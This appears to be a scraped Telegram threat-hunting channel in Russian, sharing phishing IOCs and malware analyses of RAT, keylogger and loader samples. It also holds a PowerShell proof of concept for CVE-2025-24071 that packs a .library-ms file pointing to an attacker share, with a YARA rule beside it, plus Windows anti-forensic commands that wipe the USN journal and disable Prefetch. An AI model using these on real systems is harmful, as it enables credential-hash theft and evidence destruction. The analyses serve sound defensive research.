fa
Feedback
ByTe [ ]f Digital Life

ByTe [ ]f Digital Life

رفتن به کانال در Telegram

Black Hat Hunting center @JMP_0x0

نمایش بیشتر
261
مشترکین
اطلاعاتی وجود ندارد24 ساعت
اطلاعاتی وجود ندارد7 روز
+1130 روز
آرشیو پست ها
IOC'S FROM PHISHING Отправитель: info@14-westcostship[.]com Тема: PP** 27005664 HAS SENTETİK PROFORMA HK Вложение: GEN_ARKASL
IOC'S FROM PHISHING Отправитель: info@14-westcostship[.]com Тема: PP** 27005664 HAS SENTETİK PROFORMA HK Вложение: GEN_ARKASLINE_ORIGINAL documenti_inviobolle_202503190928330337.xls SHA-256: c7e22683149a18d8ba4f84a8406eb2c67bb19c922300f9973449ced0b7deec16 Сетевые IOC:
hxxp://212.132.101[.]120/xampp/fbv/bv/preconceptfornicepeopleswatchingaround[.]hta
hxxp://107.174.202[.]139/img/new_image[.]jpg
Будет время разберу нагрузку #Remcos #AgentTesla #TA558 #SteganoArmor

RevengeRAT.pdf4.91 KB

Анализ ВПО Revenge RAT группировки Dark gaboon. Краткий и не очень интересный. Билдер взял у коллеги по цеху: https://t.me/s0
Анализ ВПО Revenge RAT группировки Dark gaboon. Краткий и не очень интересный. Билдер взял у коллеги по цеху: https://t.me/s0ld13r_ch/160

DarkWatchman.pdf1.65 MB

Анализ ВПО Dark Watchman 🙃 Группировки HIVE0117 Это мой второй в жизни реверс и первый отчёт. Жду вашу объективную критику =
Анализ ВПО Dark Watchman 🙃 Группировки HIVE0117 Это мой второй в жизни реверс и первый отчёт. Жду вашу объективную критику =)

IOC'S HiVE 0117 DarkWatchman
185.159.131[.]10
4ad74aab[.]online
4ad74aab[.]fun
4ad74aab[.]xyz
4ad74aab[.]store

Анализ загрузчика (дропера) ORDER NAME MV MYNY IMO.exe 1. Точка входа: Izsosrd.Main Cтарт программы → вызов Tplaaynnpzo.Efocu
+5
Анализ загрузчика (дропера) ORDER NAME MV MYNY IMO.exe 1. Точка входа: Izsosrd.Main Cтарт программы → вызов Tplaaynnpzo.Efocujqygg(). 2. Вызов Tplaaynnpzo.Efocujqygg Представлен код с классом Tplaaynnpzo и методом Efocujqygg Это значит: 1. Создаются две строки, Drpru = "fext0ChH7kAGdJxIRI.U7ML9Gx5VHDq9xYYtA" и Gyapkd = "ov4johdcW". 2. Вызывается метод Bgaisaf(...) у класса Lrqhplgsf, передавая туда эти две строки. Судя по тому, как дальше используется Bgaisaf, строка text (то есть "fext0ChH7kAGdJxIRI.U7ML9Gx5VHDq9xYYtA") является именем класса, а text2 ("ov4johdcW") — именем метода, который будет вызываться. Но это станет понятным, когда мы дойдём до шага с Koptrvbwfh.Dooefktty(...). 3. Вызов Lrqhplgsf.Bgaisaf Класс Lrqhplgsf содержит метод Bgaisaf(string Drpru, string Gyapkd), который делает следующее: 1. Вызывает метод Quehbmrpte() у класса Citpzigydt, чтобы получить массив байт. Как мы видим из следующего шага, это именно зашифрованная DLL/EXE, которую нужно расшифровать. 2. Создаёт Assembly из массива байт с помощью метода Hcqyxhsts. Если посмотреть соответствующий кусок кода, он просто делает return Assembly.Load(Dxztazayxoy);. То есть загружает эти байты в память. 3. new Koptrvbwfh().Dooefktty(assembly, Drpru, Gyapkd); Наконец, класс Koptrvbwfh с методом Dooefktty получает на вход загруженную сборку, а также две строки (Drpru и Gyapkd). Он внутри ищет тип Drpru (по его названию) и вызывает в нём метод Gyapkd. Таким образом, Bgaisaf — это промежуточный метод, который скачивает/дешифрует сборку и вызывает в ней нужный метод. 4. Что делает Citpzigydt.Quehbmrpte Класс Citpzigydt (скриншот с RC2) примерно такой: 1. С помощью WebClient скачивается файл по URL:
   hxxp://hirosavva-cn.com/panel/uploads/Igxpjc[.]mp4 (У меня не получилось загрузить)
   
2. Далее эти байты пропускаются через RC2‐дешифратор с жёстко прописанными:
   rc2CryptoServiceProvider.Key = Convert.FromBase64String("+1DA41ZUB73UrBWh1BpyA==");
   rc2CryptoServiceProvider.IV  = Convert.FromBase64String("hmB8S5os09A=");
   
3. Результат расшифровки возвращается как массив байтов. Таким образом, Quehbmrpte() возвращает расшифрованную сборку. 5. Что делает OctxlaqI.Hcqyxhsts Класс OctxlaqI, метод Hcqyxhsts: Берёт массив Dxztazayxoy (тот самый результат расшифровки) и загружает в память как .NET Assembly. 6. Что делает Koptrvbwfh.Dooefktty Последний логический шаг (в скриншоте класс Koptrvbwfh): Принимает: - Assembly Ubnrjykctx — та самая загруженная сборка. - string Msbidpxrv — имя класса (Type), который надо найти в сборке. - string Whuemuvodu — имя метода, который надо вызвать. Выполняет: 1. GetType(Msbidpxrv) — ищет внутри сборки тип с именем Msbidpxrv. Если не найден — throw new Exception(). 2. Создаёт делегат типа Action, передавая ему type (полученный класс) и имя метода Whuemuvodu. 3. Приводит этот делегат к Action и вызывает (), то есть фактически запускает тот метод без параметров. Таким образом, в сочетании с предыдущим шагом мы понимаем: - Drpru (фактически та же переменная, что Msbidpxrv) = "fext0ChH7kAGdJxIRI.U7ML9Gx5VHDq9xYYtA". - Gyapkd (или Whuemuvodu) = "ov4johdcW". То есть ищем в загруженном сборке класс с именем "fext0ChH7kAGdJxIRI.U7ML9Gx5VHDq9xYYtA" и вызываем в нём метод "ov4johdcW". Кстати один из IOC, которые сегодня отправил связаны с группировкой HIVE0117 постараюсь позже разобрать их нагрузку, если получится пост будет, если нет, то нет 😐

Кажется пора заканчивать с тг ботами 🕺
Кажется пора заканчивать с тг ботами 🕺

IOC'S FROM PHISHING
Отправитель: borahatay@aydingroup.kz
Тема: SİNTAŞ BOYA - KAFKASTUR İHRACATI HK.
Вложение: H25-00118 IhracatBeyanname.7z
SHA-256: c8f7131e94314b42aaa9dbff83011f1f6e0508456ea1a07d779da18f3e9035ac
Cодержимое архива: H25-00118 IhracatBeyanname.bat
SHA-256: dc1ba4ebca29ad4495a29aa2877be92e0e104fde2a40fbde972a3143dab43491

Cетевуха:
bancollc[.]top
104.21.28[.]90
172.67.145[.]51
Предположительно CloudEyE

Отправитель: megha.chaturvedi@alstomgroup.com
Тема: Re: Enquiry#05241
Вложение: ORDER NAME MV MYNY IMO.arj
SHA-256: ceb8888fe756443693f63dbedd60bcaf7911f0f9f8e5af9be76cee96a62f68ff
Cодержимое архива: ORDER NAME MV MYNY IMO.exe
SHA-256: 3bf9df96547c080c337ac832dbb50f0bd779e3fe6c7ce7db47a827aa74fc4764

Cетевуха:
hxxp://hirosavva-cn[.]com/panel/uploads/Igxpjc[.]mp4
hirosavva-cn[.]com
185.253.218[.]211

Отправитель: sudhirsingh@imp-powers.com
Тема: Payment Advice - Advice Ref:[AUEOQPB274O9] / ACH credits / Customer Ref:[FZT195] / Second Party Ref:[3750]
Вложение: payment_advice.zip
SHA-256: b60c4926b8490cf57ea1dae211de68773af191b159630bac1e77573d20f77d46
Cодержимое архива: Payment_Advice.exe
SHA-256: 6571039ee502483473ecc333d22b36b7e9b0b2375d2fe62ebc518d5e56614f53

Cетевуха:
ТГ бот
snake keylogger

Отправитель: mail@pony-express.cfd
Тема: Re: Уведомление об окончании срока бесплатного хранения
Вложение: 629-8091-5614.zip
SHA-256: c00c10124650e94e7a4fe25d5ad32ca0db27306b361c1b7c13ad1f31631b7f48
Cодержимое архива: 629-8091-5614.exe
SHA-256: 05facf2fa75c9119aaea6867fa979d3001d48847843e776d7123a5542621ef02

Отправитель: adminreport1@vaproum.biz
Тема: Re: Remittance Slip Attached
Вложение: RemittanceVO23081100084673.zip
SHA-256: aff20a0a895a5322edaf911458d3dc09a2ef86b409e9819220c45ab89dbfdea5
Cодержимое архива: RemittanceVO23081100084673.js
SHA-256: 7f2d295bca7cb02c5263a780c6d6d334c0c83b926b295cb89dcdcc26b27c6906

Cетевуха:
ia600204.us.archive[.]org
Что-то скачивает с интернет архива
Если будет время и хватит знаний попробую разобрать нагрузку, потом сделать мини отчёт, если кому интересно напишите плюсик или лайк поставьте =)

Теперь правильный ответ на вопрос "Что это за картинка?" (Да такого варианта не было 😊) Данная картинка является частью вред
+5
Теперь правильный ответ на вопрос "Что это за картинка?" (Да такого варианта не было 😊) Данная картинка является частью вредоносного ПО Snake Keylogger. ВПО состоит из 4-х частей mzVB.exe, в ресурсах которого находится данное изображение, в ходе выполнения данное изображение декодируется в TL.dll, после TL.dll декодирует Montero.dll, в ходе выполнения Montero.dll (накрытую Smart Assembly) собирает из своих ресурсов полезную нагрузку Remington.exe. Хочу выразить большую благодарность @rayhunt454 (Его канал: t.me/threathunt_pedia ), который сопровождал меня при реверсе данного ВПО и отвечал на мои порой очень глупые вопросы! IOC'S
51.38.247[.]67
varders.kozow[.]com
aborters.duckdns[.]org
anotherarmy.dns[.]army

Отправитель: sales@mail-net.top
Тема: N012-001 231109
Вложение: N012-001 231109.rar
SHA-256: d316bc5bd220a3a857b9f1e1083930b8938aacd9b88c834f22b27671340b1c80
Полезная нагрузка: n012-001-231109.exe
SHA-256: 72b15777c6ff6d05f0768124e0ac81b948f009768bff2ddb01f831290830768b
P.S прикольный блок кода Antibot 🤖

Что на это да картинка ?
Anonymous voting

IOC'S FROM PHISHING 1. Новое и старое Отправитель: admin2@vaproum.biz Тема: Request for Quotation Вложение: requestfororderqu
+2
IOC'S FROM PHISHING 1. Новое и старое
Отправитель: admin2@vaproum.biz
Тема: Request for Quotation
Вложение: requestfororderquotation19788.rar
SHA-256: 521453cbc52aa40f89433fd1feed041dbb400905d3d5445a412adcb1da615181

Полезная нагрузка:
RequestforOrderQuotation19788.vbe
SHA-256: 96595dd5338eb5b0c6e23d5c8f56231236823630f9c36c0cb8e96da60c7c0455
Взаимодействие по FTP: 162.254.34[.]31
HTTP-трафик:
hxxp://144.91.92[.]251/12032025/*множество вариаций* (примеры: /file, /w8, /w6,/r)
hxxp://144.91.92[.]251/12032025/Et9goUmltQhMQ5ClsFBP.txt
(144.91.92[.]251 - был несколько постов ранее)
Взаимодействует с api.ipify[.]org (188.114.99.232) от туда получает 45.13.191.92
2. Всё те же не манеже ТА558
Отправитель: info@m-pets.eu
Вложение: Swift_0200011080.docx
SHA-256: e64797586a57d91edf1206c34a381dd1e8f4b3321362f932fff9492079ac279b

Сетевые взаимодействия:
kryx[.]ru
144.91.127.5 (новенький)

CVE-2025-24071 рабочая история на непропатченных системах (превращает хэш жертвы в хэш низкой социальной ответственности). POC переписал на POWERSHELL чтобы было поудобнее.
$fileName = Read-Host "Enter your file name"

$libraryContent = @"
<?xml version="1.0" encoding="UTF-8"?>
<libraryDescription>
  <searchConnectorDescriptionList>
    <searchConnectorDescription>
      <simpleLocation>
        <url>\\AttackerIPAddress\shared</url>
      </simpleLocation>
    </searchConnectorDescription>
  </searchConnectorDescriptionList>
</libraryDescription>
"@

$libraryFileName = "$fileName.library-ms"
$libraryContent | Out-File -FilePath $libraryFileName -Encoding UTF8
Compress-Archive -Path $libraryFileName -DestinationPath "exploit.zip" -Force
Remove-Item $libraryFileName -Force
Write-Host "completed"
YARA-правило
rule Detect_Exploit_Library_MS
{
    meta:
        description = "Правило для обнаружения XML-шаблона, который формирует .library-ms"
        author = "bobrenok"
        date = "2025-03-19"

    strings:
        $xml_header = "<?xml version=\"1.0\" encoding=\"UTF-8\"?>"
        $library_tag = "<libraryDescription>"
        $search_list_tag = "<searchConnectorDescriptionList>"
        $search_tag = "<searchConnectorDescription>"
        $simpleLocation_tag = "<simpleLocation>"
        $url_tag = "<url>\\\\"   // Ищем '\\' в <url> (конструкция \\$ipAddress\shared)

    condition:
        all of them
}
Если фолзовое прошу прощения 😢 Подробное описание: https://cti.monster/blog/2025/03/18/CVE-2025-24071.html

ANTI-FORENSIC WIN 💋 Рассмотрим несколько интересных методов антикриминалистики в WINDOWS 1. Очистка DNS кеша ipconfig /flush
ANTI-FORENSIC WIN 💋 Рассмотрим несколько интересных методов антикриминалистики в WINDOWS 1. Очистка DNS кеша
ipconfig /flushdns >$null
2. Отключение NTFS Last Access Time
Set-ItemProperty -Path 'HKLM:\SYSTEM\CurrentControlSet\Control\FileSystem' -Name 'NtfsDisableLastAccessUpdate' -Value 1 -Force
fsutil behavior set disablelastaccess 3 >$null
NtfsDisableLastAccessUpdate = 1: при значении 1 в реестре Windows перестаёт обновлять поле «Дата последнего доступа» к файлам и папкам, когда к ним просто обращаются для чтения (не изменяя при этом содержимое). fsutil behavior set disablelastaccess 3: дополнительная команда, которая на уровне системы (через утилиту fsutil) указывает Windows не обновлять метку времени последнего доступа. 3. Отключение Prefetch и Superfetch Prefetch - один из значимых артефактов ОС Windows который позволяет фиксировать запуск ПО на хосте.
Set-ItemProperty -Path 'HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\' -Name 'EnablePrefetcher' -Value 0 -Force
Set-ItemProperty -Path 'HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\' -Name 'EnableSuperfetch' -Value 0 -Force
Эти параметры в реестре отвечают за технологии Prefetch и Superfetch. EnablePrefetcher = 0: при 0 Windows не будет создавать файлы-префетч для приложений (включая системные). EnableSuperfetch = 0: Superfetch также отключается. 4. Остановка службы Windows Timeline (CDPUserSvc)
Stop-Service -Name CDPUserSvc* -Force 2>$null
CDPUserSvc (Connected Devices Platform) — сервис, который, в частности, отвечает за сбор данных для «Журнала действий», «Таймлайна» и некоторые функции синхронизации с облачными сервисами. 5. Удаление журнала USN (NTFS Change Journal)
fsutil usn deletejournal /d c: 2>$null
Команда fsutil usn deletejournal /d c: удаляет «журнал изменений» (USN Journal) на разделе C:. Журнал USN (Update Sequence Number Journal) отслеживает все изменения на том или ином томе с файловой системой NTFS — созданы ли файлы, отредактированы, перенесены и т.д.

IOC'S FROM PHISHING Отправитель: info@hydrotons.eu Тема: RE: Нова поръчка 03M4138-24 Вложение: поръчка_03M4138.docx - CVE-201
+3
IOC'S FROM PHISHING Отправитель: info@hydrotons.eu Тема: RE: Нова поръчка 03M4138-24 Вложение: поръчка_03M4138.docx - CVE-2017-0199 (описывается постом выше)
SHA-256: c4ca2614797569a0427242f6db7e5cc00be0d0edb358629a9350e31b5a7f4e49
__
Документ приманка - Microsoft_Office_Excel_Worksheet1.xlsx
 SHA-256: 32664f8fda495d4968ed02422912b16c84e1e2c83549c090c4d177ae73b81d70
Вредоносный документ: givenbestresultswithglorryeyeshappinessgivenbestresultswithglorryeyeshappiness_givenbestresultswithglorryeyeshappiness.doc (Выполняет СVE-2017-11882) скачивается c
hxxps://kryx[.]ru/8IJcFB?&amp
Данные длинные и сложные символы представляют собой код несуществующего шрифта, занимающий 48 байт. Уязвимый редактор формул MW не в состоянии обработать такое количество информации, что приводит к переполнению буфера при попытке скопировать шрифтовой код в локальный буфер обмена. Программа EQNEDT32.EXE может копировать лишь 40 байт, и после завершения выполнения функции поток перейдет на адрес, необходимый злоумышленнику. (https://github.com/rip1s/CVE-2017-11882/blob/master/CVE-2017-11882.py кому интересно как примерно генерируется нагрузка) Дополнительные IOC
givenbestresultswithglorryeyeshappiness.hta - SHA-256: 5992f2fdd1ab49735bbaee232f58c74d251256245bf318ea7c3c34ffb471d159

hxxp://104.168.7[.]38/xampp/sv/ENCRYPTION01[.]jpg (exe в изображении)

revers loader - hxxp://213.165.70[.]90/346/givenbestresultswithglorryeyeshappiness[.]txt

213.165.70[.]90
188.225.72[.]170
104.168.7[.]38
Cудя по почерку напоминает SteganoAmor: TA558 (cкорее всего они и есть). Подробно о них писали https://www.ptsecurity.com/ru-ru/research/pt-esc-threat-intelligence/operaciya-steganoamor-ta558-massovo-atakuet-kompanii-i-gosudarstvennye-uchrezhdeniya-po-vsemu-miru/

IOC'S FROM PHISHING Интересный образец реализующий CVE-2017-0199 (Основная причина возникновения данного бага заключается в н
+3
IOC'S FROM PHISHING Интересный образец реализующий CVE-2017-0199 (Основная причина возникновения данного бага заключается в неправильной обработке ответов от сервера в функции Microsoft OLE (Object Linking and Embedding), предназначенной для встраивания одних документов в другие. При открытии зараженного документа приложение отправляет запрос на удаленный сервер для получения встроенного файла. Сервер, в свою очередь, возвращает специально подготовленный ответ, содержащий вредоносный файл HTA. Код из этого файла, после его загрузки, выполняется на целевой системе, что может привести к серьезным последствиям.) Первично доставляется .doc файл в структуре которого конкретно в rels.settings.xlm (рис. 1) хранится закодированная ссылка (рис. 2) на удаленный сервис с которого скачивается документ .rtf (рис. 3) Цепочка выполнения: 1.Злоумышленник отправляет целевому пользователю по электронной почте документ Microsoft Word со встроенным объектом ссылки OLE2. 2. Когда пользователь открывает документ, winword.exe отправляет HTTP-запрос на удаленный сервер для получения вредоносного файла HTA. 3. Файл, возвращенный сервером, является поддельным RTF-файлом со встроенным вредоносным скриптом. 4. Winword.exe ищет обработчик файла для application/hta через COM-объект, что заставляет приложение Microsoft HTA (mshta.exe) загрузить и выполнить вредоносный скрипт.
Отправитель: karina@toolhaus.ru
Тема: Досудебная претензия
Вложение: претензия.doc
SHA-256: c19dd49969ca352c8dc91326c2ab946e828c51e72cf04d64aedfa87109dc58ef
hxxp://ecols[.]ru

144.91.79{.}54 Просто без комментариев 🔪
144.91.79{.}54 Просто без комментариев 🔪

IOC'S FROM PHISHING Отправитель: noreply@vaproum.biz Тема: Draft / 25-01217L02 Вложение: Draft Documents.rar - 0eef3cc0bd4a09
+1
IOC'S FROM PHISHING
Отправитель: noreply@vaproum.biz
Тема: Draft / 25-01217L02
Вложение: Draft Documents.rar - 0eef3cc0bd4a095afde2b55ac2da9e7399b94d7cb3c49d9ae00bb4a97a2d15e1
Полезная нагрузка: Draft Documents.vbe - 19327621882697dbaaea22aac19d398ee91756463acf36b516ca36707d4b74b6
Сетевое взаимодействие:
http://144.91.92.251/05032025/w5
144.91.92.251


Отправитель: info@vasantslabels.com
Тема: Invoice- Trikaya Bio (Shrinath Mhaskoba )
Вложение: Way bill & Invoice.zip - a229cbc112ad88ecdd91c7effac11b517ddc19d82ddff5733f5424cdb01ad78e
Полезная нагрузка: Way bill & Invoice.exe - 0c44b7da727d77d876e583f808b0673875fa804a47d62aab624e69174fa7e851
Сетевое взаимодействие:
ТГ бот

Интересный способ обхода почтовых песочниц с помощью .svg файлов. В .svg файлы возможно встраивать скрипты, что позволяет вып
+3
Интересный способ обхода почтовых песочниц с помощью .svg файлов. В .svg файлы возможно встраивать скрипты, что позволяет выполнять и декодировать полезную нагрузку. Рассмотрим боевое письмо. На картинке 1 мы можем увидеть как выглядит .svg в браузере, на второй картинке изображена часть .svg файла, если просматривать его через любой текстовый редактор, там мы можем увидеть закодированные base64 строки архива, на картинке 3 результат декодирования данной base64 строки и сигнатуры PK, которая характерна для zip (jar, odt, ods, odp, docx, xlsx, pptx, vsdx, apk, aar файлов (возможно какие-то форматы упустил). После извлечения декодированного файла (в данном случае) получаем zip-архив, в самом архиве находится .js файл полезной нагрузки (картинка 4). Данная полезная нагрузка является ВПО ADwind. Кто хочет проанализировать семпл ручками: https://any.run/report/701435e822a78b82d53281af3ffb20b3732462ec99c6f36afdfc6f8eed4123f9/552cd48d-484e-4eba-b36c-97bfca897fda Сам частичный анализ полезной нагрузки можно почитать: https://medium.com/@jaroslavbrtan/javascript-sample-1-13-2025-08d41e041d81 Для деобфускации: https://deobfuscate.io/ https://obf-io.deobfuscate.io/